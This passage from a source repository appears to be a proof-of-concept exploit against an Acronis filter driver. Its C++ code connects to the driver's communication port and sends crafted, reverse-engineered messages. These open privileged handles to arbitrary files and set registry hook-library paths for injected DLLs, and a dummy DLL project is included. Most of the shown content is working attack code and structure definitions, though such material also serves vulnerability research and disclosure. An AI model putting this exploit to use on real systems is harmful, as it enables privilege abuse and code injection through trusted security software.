 33 | 				for (j = (i + 1) % 16; j < 16; ++j) {
 34 | 					printf("   ");
 35 | 				}
 36 | 				printf("|  %s \n", ascii);
 37 | 			}
 38 | 		}
 39 | 	}
 40 | }
 41 | 
 42 | BOOL OpenFile_Acronis(HANDLE hPort, const wchar_t* lpFileName, PHANDLE lpOutHandle)
 43 | {
 44 | 	if (!hPort || !lpOutHandle) {
 45 | 		return FALSE;
 46 | 	}
 47 | 	puts("In OpenFile_Acronis");
 48 | 	HRESULT hResult = 0;
 49 | 	HANDLE hHeap = GetProcessHeap();
 50 | 	PACRONIS_FLT_MESSAGE pAcronisMessage = (PACRONIS_FLT_MESSAGE)HeapAlloc(hHeap, HEAP_ZERO_MEMORY, sizeof(ACRONIS_FLT_MESSAGE));
 51 | 	LPVOID lpOutBuf = HeapAlloc(hHeap, HEAP_ZERO_MEMORY, 0x1000);
 52 | 	DWORD dwBytesReturned = 0;
 53 | 
 54 | 	if (!pAcronisMessage || !lpOutBuf) {
 55 | 		GLE("Failed to alloc message to open file.");
 56 | 		return FALSE;
 57 | 	}	
 58 | 
 59 | 	printf("Calling CreateScanContextWithDir for file %ls\n", lpFileName);
 60 | 
 61 | 	DWORD dwCid = CreateScanContextWithDir(hPort, lpFileName);
 62 | 	if (!dwCid || dwCid == -1) {
 63 | 		GLE("CreateScanContextWithDir failed");
 64 | 		return FALSE;
 65 | 	}
 66 | 
 67 | 	printf("Created scan context with id : 0x%lx\n", dwCid);
 68 | 	
 69 | 	pAcronisMessage->dwHeader = ACRONIS_FLT_MSG_HDR;
 70 | 	pAcronisMessage->dwMessageType = 0x22;
 71 | 	pAcronisMessage->dwMessageSize = 0x00000008;
 72 | 	pAcronisMessage->reserved0[0] = dwCid;
 73 | 
 74 | 	for (int j = 1; j < 12; j++) {
 75 | 		pAcronisMessage->reserved0[j] = genPattern('a' + j);
 76 | 	}
 77 | 
 78 | 	hResult = FilterSendMessage(hPort, pAcronisMessage, sizeof(ACRONIS_FLT_MESSAGE), lpOutBuf, 0x1000, &dwBytesReturned);
 79 | 	
 80 | 	if (!(FAILED(hResult))) {
 81 | 		PACRONIS_SCANDIR_RESP pResp = (PACRONIS_SCANDIR_RESP)lpOutBuf;
 82 | 		printf("Got Scan context with id - %d\n\tHRES 0x%lx\n\tHANDLE - 0x%p\n", dwCid, hResult, pResp->hFile);
 83 | 		*lpOutHandle = pResp->hFile;
 84 | 		HeapFree(hHeap, 0, lpOutBuf);
 85 | 		HeapFree(hHeap, 0, pAcronisMessage);		
 86 | 		return TRUE;
 87 | 	}
 88 | 
 89 | 	HeapFree(hHeap, 0, lpOutBuf);
 90 | 	HeapFree(hHeap, 0, pAcronisMessage);
 91 | 	return FALSE;
 92 | }
 93 | 
 94 | DWORD CreateScanContextWithDir(HANDLE hPort, const wchar_t* lpFileName)
 95 | {
 96 | 	HANDLE hHeap = GetProcessHeap();
 97 | 	HRESULT hResult = 0;
 98 | 	DWORD dwBytesReturned = 0;
 99 | 	puts("Attempting to create scan context for file.");
100 | 	PACRONIS_FLT_CREATE_CONTEXTDIR lpAccFltCreate = (PACRONIS_FLT_CREATE_CONTEXTDIR)HeapAlloc(
101 | 		hHeap,
102 | 		HEAP_ZERO_MEMORY,
103 | 		sizeof(ACRONIS_FLT_CREATE_CONTEXTDIR)
104 | 	);
105 | 
106 | 	LPVOID lpOutBuf = HeapAlloc(
107 | 		hHeap,
108 | 		HEAP_ZERO_MEMORY,
109 | 		0x1000
110 | 	);
111 | 
112 | 	if (!lpAccFltCreate || !lpOutBuf) {
113 | 		GLE("Failed to alloc data for context creation");
114 | 		return (DWORD)-1;
115 | 	}
116 | 
117 | 	lpAccFltCreate->dwHeader = ACRONIS_FLT_MSG_HDR;
118 | 	lpAccFltCreate->dwMessageType = ACRONIS_OP_CREATEFILE_CONTEXTDIR;
119 | 	lpAccFltCreate->dwMessageSize = (lstrlenW(lpFileName)) * sizeof(WCHAR);
120 | 	lpAccFltCreate->reserved0 = lpAccFltCreate->dwMessageSize;
121 | 	lpAccFltCreate->toSkip = 0x10;
122 | 	lpAccFltCreate->reserved2 = 1;
123 | 	lpAccFltCreate->reserved4 = 1;
124 | 	lpAccFltCreate->reserved5 = 1;
125 | 	lpAccFltCreate->reserved1 = 1;
126 | 	lstrcpyW(lpAccFltCreate->wstrPath, lpFileName);
127 | 
128 | 	hResult = FilterSendMessage(hPort, lpAccFltCreate, sizeof(ACRONIS_FLT_CREATE_CONTEXTDIR), lpOutBuf, 0x1000, &dwBytesReturned);
129 | 	if (FAILED(hResult)) {
130 | 		printf("Create FLT Context With Dir Failed with 0x%lx\n", hResult);
131 | 		HeapFree(hHeap, 0, lpAccFltCreate);
132 | 		HeapFree(hHeap, 0, lpOutBuf);
133 | 		return (DWORD)-1;
134 | 	}
135 | 
136 | 	if (!dwBytesReturned) {
137 | 		GLE("FilterSendMessage returned zero bytes!");
138 | 		HeapFree(hHeap, 0, lpAccFltCreate);
139 | 		HeapFree(hHeap, 0, lpOutBuf);
140 | 		return (DWORD)-1;
141 | 	}
142 | 
143 | 	DWORD dwContextId = ((PACRONIS_CCWD)lpOutBuf)->contextID;
144 | 	HeapFree(hHeap, 0, lpAccFltCreate);
145 | 	HeapFree(hHeap, 0, lpOutBuf);
146 | 	return dwContextId;
147 | }
148 | 
149 | BOOL SetRegKeyHookLibs(HANDLE hPort, const wchar_t* x86HookLibPath, const wchar_t* x64HookLibPath) {
150 | 	if (!(hPort && x64HookLibPath && x86HookLibPath)) {
151 | 		puts("Arg error");
152 | 		return FALSE;
153 | 	}
154 | 
155 | 
156 | 
157 | 	HRESULT hResult = 0;
158 | 	DWORD dwBytesReturned = 0;
159 | 	HANDLE hHeap = GetProcessHeap();
160 | 	PACRONIS_FLT_REG_SET_HOOKLIBS lpObjHookLibs = (PACRONIS_FLT_REG_SET_HOOKLIBS)HeapAlloc(hHeap, HEAP_ZERO_MEMORY, sizeof(ACRONIS_FLT_REG_SET_HOOKLIBS));
161 | 	LPVOID lpOutBuf = HeapAlloc(
162 | 		hHeap,
163 | 		HEAP_ZERO_MEMORY,
164 | 		0x1000
165 | 	);
166 | 
167 | 	if (!(lpObjHookLibs  && lpOutBuf)) {
168 | 		GLE("Failed to alloc hook libs structure");
169 | 		return FALSE;
170 | 	}
171 | 
172 | 	puts("Allocated, calling filter.");
173 | 	lpObjHookLibs->dwHeader = ACRONIS_FLT_MSG_HDR;
174 | 	lpObjHookLibs->dwMessageSize = (lstrlenW(x86HookLibPath)) * sizeof(WCHAR);
175 | 	lpObjHookLibs->dwMessageType = ACRONIS_OP_REG_SET_HOOKLIBS;
176 | 	lpObjHookLibs->toSkip0 = 0x10;
177 | 	lpObjHookLibs->toSkip1 = 8 + (sizeof(wchar_t) * (MAX_PATH + 1));
178 | 	lpObjHookLibs->reserved0 = (lstrlenW(x86HookLibPath)) * sizeof(WCHAR);
179 | 	lpObjHookLibs->reserved2 = (lstrlenW(x64HookLibPath)) * sizeof(WCHAR);
180 | 
181 | 	lstrcpyW(lpObjHookLibs->wstrx86LibPath, x86HookLibPath);
182 | 	lstrcpyW(lpObjHookLibs->wstrx64LibPath, x64HookLibPath);
183 | 
184 | 	hResult = FilterSendMessage(hPort, lpObjHookLibs, sizeof(ACRONIS_FLT_REG_SET_HOOKLIBS), lpOutBuf, 0x100, &dwBytesReturned);
185 | 	puts("Sent filter message");
186 | 
187 | 	if (FAILED(hResult)) {
188 | 		printf("Filter message failed with error 0x%lx\n", hResult);
189 | 		return FALSE;
190 | 	}
191 | 
192 | 	puts("Change reg keys succeeded");
193 | 	return TRUE;
194 | }


--------------------------------------------------------------------------------
/AcronisPoC/Acronis-Common.h:
--------------------------------------------------------------------------------
 1 | #pragma once
 2 | 
 3 | #include <Windows.h>
 4 | #include <winternl.h>
 5 | #include <stdio.h>
 6 | #include <Fltuser.h>
 7 | #pragma comment(lib, "FltLib")
 8 | 
 9 | 
10 | #define GLE( x ) { printf("%s failed with error: %d\n", x , GetLastError()); }
11 | 
12 | DWORD64 genPattern(BYTE b);
13 | void DumpHex(const void* data, size_t size);// https://gist.github.com/ccbrown/9722406
14 | BOOL OpenFile_Acronis(HANDLE hPort, const wchar_t* lpFileName, PHANDLE lpOutHandle);
15 | DWORD CreateScanContextWithDir(HANDLE hPort, const wchar_t* lpFileName);
16 | BOOL SetRegKeyHookLibs(HANDLE hPort, const wchar_t* x86HookLibPath, const wchar_t* x64HookLibPath);
17 | 
18 | // begin context
19 | 
20 | #define ACRONIS_CTX_OWNER (DWORD)1
21 | #define ACRONIS_CTX_NOTOWNER (DWORD)2
22 | 
23 | typedef struct ACRONIS_FLT_CTX {
24 | 	DWORD reserved0;
25 | 	DWORD dwContextSwitch;
26 | }ACRONIS_FLT_CTX, * PACRONIS_FLT_CTX;
27 | 
28 | // end context
29 | 
30 | // begin message types
31 | 
32 | #define ACRONIS_OP_CREATEFILE 0x22
33 | #define ACRONIS_OP_QUERYINFOFILE 0x5
34 | #define ACRONIS_OP_CREATEFILE_CONTEXTDIR 0x1b
35 | #define ACRONIS_OP_REG_SET_HOOKLIBS 0x37
36 | 
37 | // end message types
38 | 
39 | 
40 | // begin message buffer
41 | 
42 | #define ACRONIS_FLT_MSG_HDR (DWORD64)0x54724D73
43 | #pragma pack(push)
44 | #pragma pack(4)
45 | typedef struct ACRONIS_FLT_MESSAGE {
46 | 	DWORD dwHeader; // must be ACRONIS_FLT_MSG_HDR
47 | 	DWORD dwMessageType; // opcode
48 | 	DWORD dwMessageSize;
49 | 	DWORD64 reserved0[12];
50 | } ACRONIS_FLT_MESSAGE, * PACRONIS_FLT_MESSAGE;
51 | 
52 | typedef struct ACRONIS_SCANDIR_RESP {
53 | 	DWORD64 reserved0;
54 | 	DWORD reserved1;
55 | 	HANDLE hFile;
56 | }ACRONIS_SCANDIR_RESP, * PACRONIS_SCANDIR_RESP;
57 | 
58 | typedef struct ACRONIS_CCWD {
59 | 	DWORD64 reserved0;
60 | 	DWORD reserved1;
61 | 	DWORD contextID;
62 | }ACRONIS_CCWD, * PACRONIS_CCWD;
63 | #pragma pack(pop)
64 | 
65 | 
66 | #pragma pack(push)
67 | #pragma pack(2)
68 | typedef struct ACRONIS_FLT_CREATE_CONTEXTDIR {
69 | 	DWORD dwHeader; // must be ACRONIS_FLT_MSG_HDR
70 | 	DWORD dwMessageType; // opcode
71 | 	DWORD dwMessageSize;
72 | 	DWORD reserved0;
73 | 	WORD reserved1;
74 | 	WORD toSkip;
75 | 	WORD reserved2;
76 | 	WORD reserved3;
77 | 	WORD reserved4;
78 | 	WORD reserved5;
79 | 	WCHAR wstrPath[MAX_PATH + 1];
80 | }ACRONIS_FLT_CREATE_CONTEXTDIR, * PACRONIS_FLT_CREATE_CONTEXTDIR;
81 | #pragma pack(pop)
82 | 
83 | #pragma pack(push)
84 | #pragma pack(2)
85 | typedef struct ACRONIS_FLT_REG_SET_HOOKLIBS {
86 | 	DWORD dwHeader; // must be ACRONIS_FLT_MSG_HDR
87 | 	DWORD dwMessageType; // opcode
88 | 	DWORD dwMessageSize;
89 | 	DWORD reserved0;
90 | 	WORD reserved1;
91 | 	WORD toSkip0;
92 | 	DWORD reserved2;
93 | 	WORD reserved3;
94 | 	WORD toSkip1;
95 | 	WCHAR wstrx86LibPath[MAX_PATH + 1];	
96 | 	WCHAR wstrx64LibPath[MAX_PATH + 1];
97 | }ACRONIS_FLT_REG_SET_HOOKLIBS, * PACRONIS_FLT_REG_SET_HOOKLIBS;
98 | #pragma pack(pop)
99 | // end message buffer


--------------------------------------------------------------------------------
/AcronisPoC/AcronisPoC.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Release|Win32">
  9 |       <Configuration>Release</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <VCProjectVersion>16.0</VCProjectVersion>
 23 |     <Keyword>Win32Proj</Keyword>
 24 |     <ProjectGuid>{d7f0a2cd-dd9b-40df-a5d0-005643f68bd7}</ProjectGuid>
 25 |     <RootNamespace>AcronisPoC</RootNamespace>
 26 |     <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
 27 |     <ProjectName>AcronisPoC-ReadFile</ProjectName>
 28 |   </PropertyGroup>
 29 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 30 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 31 |     <ConfigurationType>Application</ConfigurationType>
 32 |     <UseDebugLibraries>true</UseDebugLibraries>
 33 |     <PlatformToolset>v143</PlatformToolset>
 34 |     <CharacterSet>Unicode</CharacterSet>
 35 |   </PropertyGroup>
 36 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 37 |     <ConfigurationType>Application</ConfigurationType>
 38 |     <UseDebugLibraries>false</UseDebugLibraries>
 39 |     <PlatformToolset>v143</PlatformToolset>
 40 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 41 |     <CharacterSet>Unicode</CharacterSet>
 42 |   </PropertyGroup>
 43 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 44 |     <ConfigurationType>Application</ConfigurationType>
 45 |     <UseDebugLibraries>true</UseDebugLibraries>
 46 |     <PlatformToolset>v143</PlatformToolset>
 47 |     <CharacterSet>Unicode</CharacterSet>
 48 |   </PropertyGroup>
 49 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 50 |     <ConfigurationType>Application</ConfigurationType>
 51 |     <UseDebugLibraries>false</UseDebugLibraries>
 52 |     <PlatformToolset>v143</PlatformToolset>
 53 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 54 |     <CharacterSet>Unicode</CharacterSet>
 55 |   </PropertyGroup>
 56 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 57 |   <ImportGroup Label="ExtensionSettings">
 58 |   </ImportGroup>
 59 |   <ImportGroup Label="Shared">
 60 |   </ImportGroup>
 61 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 62 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 63 |   </ImportGroup>
 64 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 65 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 66 |   </ImportGroup>
 67 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 68 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 69 |   </ImportGroup>
 70 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 71 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 72 |   </ImportGroup>
 73 |   <PropertyGroup Label="UserMacros" />
 74 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 75 |     <LinkIncremental>true</LinkIncremental>
 76 |   </PropertyGroup>
 77 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 78 |     <LinkIncremental>false</LinkIncremental>
 79 |   </PropertyGroup>
 80 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 81 |     <LinkIncremental>true</LinkIncremental>
 82 |   </PropertyGroup>
 83 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 84 |     <LinkIncremental>false</LinkIncremental>
 85 |   </PropertyGroup>
 86 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 87 |     <ClCompile>
 88 |       <WarningLevel>Level3</WarningLevel>
 89 |       <SDLCheck>true</SDLCheck>
 90 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 91 |       <ConformanceMode>true</ConformanceMode>
 92 |       <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
 93 |     </ClCompile>
 94 |     <Link>
 95 |       <SubSystem>Console</SubSystem>
 96 |       <GenerateDebugInformation>true</GenerateDebugInformation>
 97 |     </Link>
 98 |   </ItemDefinitionGroup>
 99 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
100 |     <ClCompile>
101 |       <WarningLevel>Level3</WarningLevel>
102 |       <FunctionLevelLinking>true</FunctionLevelLinking>
103 |       <IntrinsicFunctions>true</IntrinsicFunctions>
104 |       <SDLCheck>true</SDLCheck>
105 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
106 |       <ConformanceMode>true</ConformanceMode>
107 |     </ClCompile>
108 |     <Link>
109 |       <SubSystem>Console</SubSystem>
110 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
111 |       <OptimizeReferences>true</OptimizeReferences>
112 |       <GenerateDebugInformation>true</GenerateDebugInformation>
113 |     </Link>
114 |   </ItemDefinitionGroup>
115 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
116 |     <ClCompile>
117 |       <WarningLevel>Level3</WarningLevel>
118 |       <SDLCheck>true</SDLCheck>
119 |       <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
120 |       <ConformanceMode>true</ConformanceMode>
121 |       <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
122 |     </ClCompile>
123 |     <Link>
124 |       <SubSystem>Console</SubSystem>
125 |       <GenerateDebugInformation>true</GenerateDebugInformation>
126 |     </Link>
127 |   </ItemDefinitionGroup>
128 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
129 |     <ClCompile>
130 |       <WarningLevel>Level3</WarningLevel>
131 |       <FunctionLevelLinking>true</FunctionLevelLinking>
132 |       <IntrinsicFunctions>true</IntrinsicFunctions>
133 |       <SDLCheck>true</SDLCheck>
134 |       <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
135 |       <ConformanceMode>true</ConformanceMode>
136 |     </ClCompile>
137 |     <Link>
138 |       <SubSystem>Console</SubSystem>
139 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
140 |       <OptimizeReferences>true</OptimizeReferences>
141 |       <GenerateDebugInformation>true</GenerateDebugInformation>
142 |     </Link>
143 |   </ItemDefinitionGroup>
144 |   <ItemGroup>
145 |     <ClCompile Include="Acronis-Common.cpp" />
146 |     <ClCompile Include="main-readfile.cpp" />
147 |   </ItemGroup>
148 |   <ItemGroup>
149 |     <ClInclude Include="Acronis-Common.h" />
150 |   </ItemGroup>
151 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
152 |   <ImportGroup Label="ExtensionTargets">
153 |   </ImportGroup>
154 | </Project>


--------------------------------------------------------------------------------
/AcronisPoC/AcronisPoC.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Resource Files">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <ClCompile Include="main-readfile.cpp">
19 |       <Filter>Source Files</Filter>
20 |     </ClCompile>
21 |     <ClCompile Include="Acronis-Common.cpp">
22 |       <Filter>Source Files</Filter>
23 |     </ClCompile>
24 |   </ItemGroup>
25 |   <ItemGroup>
26 |     <ClInclude Include="Acronis-Common.h">
27 |       <Filter>Header Files</Filter>
28 |     </ClInclude>
29 |   </ItemGroup>
30 | </Project>


--------------------------------------------------------------------------------
/AcronisPoC/main-readfile.cpp:
--------------------------------------------------------------------------------
 1 | #include <Windows.h>
 2 | 
 3 | #include <Fltuser.h>
 4 | #pragma comment(lib, "FltLib")
 5 | 
 6 | #include <stdio.h>
 7 | #include "Acronis-Common.h"
 8 | 
 9 | int main() {
10 | 	HRESULT hResult = 0;
11 | 	HANDLE hFile = 0;
12 | 	HANDLE hPort = 0;
13 | 	HANDLE hHeap = GetProcessHeap();
14 | 	DWORD dwBytesReturned = 0;
15 | 	BOOL bRes = FALSE;
16 | 
17 | 	ACRONIS_FLT_CTX aCtx = { 0 };
18 | 	PACRONIS_FLT_MESSAGE pAcronisMessage = (PACRONIS_FLT_MESSAGE)HeapAlloc(hHeap, HEAP_ZERO_MEMORY, sizeof(ACRONIS_FLT_MESSAGE));
19 | 	LPVOID lpOutBuf = HeapAlloc(hHeap, HEAP_ZERO_MEMORY, 0x1000);
20 | 	const wchar_t* strSrcFile = LR"(\??\C:\Windows\System32\cmd.exe)";
21 | 
22 | 	if (!pAcronisMessage) {
23 | 		GLE("HeapAlloc - AcronisMessage");
24 | 		return -1;
25 | 	}
26 | 
27 | 	aCtx.dwContextSwitch = ACRONIS_CTX_OWNER;
28 | 
29 | 	hResult = FilterConnectCommunicationPort(
30 | 		L"\\AcronisNgScanServicePort",
31 | 		0,
32 | 		&aCtx,
33 | 		sizeof(aCtx),
34 | 		NULL,
35 | 		&hPort
36 | 	);
37 | 
38 | 	if (FAILED(hResult)) {
39 | 		GLE("FilterConnectCommunicationPort");
40 | 		printf("\tFLT Status: %lx\n", hResult);
41 | 		CloseHandle(hPort);
42 | 		return -1;
43 | 	}
44 | 
45 | 	puts("Connected to FLT Comm Port, attempting to open file.");
46 | 	bRes = OpenFile_Acronis(hPort, strSrcFile, &hFile);
47 | 
48 | 	if (!bRes) {
49 | 		GLE("Failed to open file!");
50 | 		return -1;
51 | 	}
52 | 
53 | 	printf("Successfully opened handle to file - 0x%p\nPress any key to continue...", hFile);
54 | 	getchar();
55 | 	CloseHandle(hPort);
56 | 	CloseHandle(hFile);	
57 | 	return 0;
58 | 
59 | }
60 | 
61 | 


--------------------------------------------------------------------------------
/DummyDll/DummyDll.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Release|Win32">
  9 |       <Configuration>Release</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <VCProjectVersion>16.0</VCProjectVersion>
 23 |     <Keyword>Win32Proj</Keyword>
 24 |     <ProjectGuid>{b88f1494-66ed-485d-9aeb-3fed074997b9}</ProjectGuid>
 25 |     <RootNamespace>DummyDll</RootNamespace>
 26 |     <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
 27 |   </PropertyGroup>
 28 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 29 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 30 |     <ConfigurationType>DynamicLibrary</ConfigurationType>
 31 |     <UseDebugLibraries>true</UseDebugLibraries>
 32 |     <PlatformToolset>v143</PlatformToolset>
 33 |     <CharacterSet>Unicode</CharacterSet>
 34 |   </PropertyGroup>
 35 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 36 |     <ConfigurationType>DynamicLibrary</ConfigurationType>
 37 |     <UseDebugLibraries>false</UseDebugLibraries>
 38 |     <PlatformToolset>v143</PlatformToolset>
 39 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 40 |     <CharacterSet>Unicode</CharacterSet>
 41 |   </PropertyGroup>
 42 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 43 |     <ConfigurationType>DynamicLibrary</ConfigurationType>
 44 |     <UseDebugLibraries>true</UseDebugLibraries>
 45 |     <PlatformToolset>v143</PlatformToolset>
 46 |     <CharacterSet>Unicode</CharacterSet>
 47 |   </PropertyGroup>
 48 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 49 |     <ConfigurationType>DynamicLibrary</ConfigurationType>
 50 |     <UseDebugLibraries>false</UseDebugLibraries>
 51 |     <PlatformToolset>v143</PlatformToolset>
 52 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 53 |     <CharacterSet>Unicode</CharacterSet>
 54 |   </PropertyGroup>
 55 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 56 |   <ImportGroup Label="ExtensionSettings">
 57 |   </ImportGroup>
 58 |   <ImportGroup Label="Shared">
 59 |   </ImportGroup>
 60 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 61 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 62 |   </ImportGroup>
 63 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 64 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 65 |   </ImportGroup>
 66 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 67 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 68 |   </ImportGroup>
 69 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 70 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 71 |   </ImportGroup>
 72 |   <PropertyGroup Label="UserMacros" />
 73 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 74 |     <LinkIncremental>true</LinkIncremental>
 75 |   </PropertyGroup>
 76 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 77 |     <LinkIncremental>false</LinkIncremental>
 78 |   </PropertyGroup>
 79 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 80 |     <LinkIncremental>true</LinkIncremental>
 81 |   </PropertyGroup>
 82 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 83 |     <LinkIncremental>false</LinkIncremental>
 84 |   </PropertyGroup>
 85 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 86 |     <ClCompile>
 87 |       <WarningLevel>Level3</WarningLevel>
 88 |       <SDLCheck>true</SDLCheck>
 89 |       <PreprocessorDefinitions>WIN32;_DEBUG;DUMMYDLL_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
